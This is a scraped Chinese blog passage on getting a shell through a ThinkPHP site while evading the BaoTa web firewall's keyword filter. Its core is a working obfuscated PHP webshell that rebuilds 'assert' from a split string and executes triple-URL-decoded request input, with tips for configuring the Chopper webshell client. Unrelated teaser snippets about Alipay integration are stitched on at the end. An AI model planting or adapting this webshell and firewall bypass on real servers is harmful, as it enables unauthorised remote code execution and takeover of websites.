可以看到直接被攔了,經測試這裡是敏感函式字元攔截,大部分有用的敏感函式都被攔了,這裡面被攔的是phpinfo()
emmmm,怎麼辦呢。。。。。
直接執行**不行,那麼就寫入**吧,用file_put_contents()函式進行寫入。
但這裡又有乙個問題,正常的寫入由於請求引數中帶有敏感字元一樣會被攔,並且使用小馬執行呼叫敏感函式的時候也會被攔
所以得配合點黑科技,使用特殊小馬,加url編碼三次
url:
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_request['12345']))));
?>
小馬:
<?php值要進行三次url加密$poc ="axsxsxexrxt";
$poc_1 = explode("x", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];
$poc_2(urldecode(urldecode(urldecode($_request['12345']))));
原版c刀配置:
php_make引數進行三次url加密,和設定請求頭即可
Thinkphp繞過寶塔getshell
可以看到直接被攔了,經測試這裡是敏感函式字元攔截,大部分有用的敏感函式都被攔了,這裡面被攔的是phpinfo emmmm,怎麼辦呢。直接執行 不行,那麼就寫入 吧,用file put contents 函式進行寫入。但這裡又有乙個問題,正常的寫入由於請求引數中帶有敏感字元一樣會被攔,並且使用小馬執行...
thinkphp框架使用支付寶
最近工作原因需要使用支付寶支付,所以總結了下支付寶支付介面如何在thinkphp當中使用。alipay.config.php是相關引數的配置檔案 alipayapi.php 是支付寶介面入口檔案 notify url.php 是伺服器非同步通知頁面檔案 return url.php 是頁面跳轉同步通...
thinkphp支付寶手機支付流程提示
統一下單 public function pay 商戶訂單號,商戶 訂單系統中唯一訂單號,必填 out trade no date ymd rand 1000,9999 substr implode null,array map ord str split substr uniqid 5,13 1 ...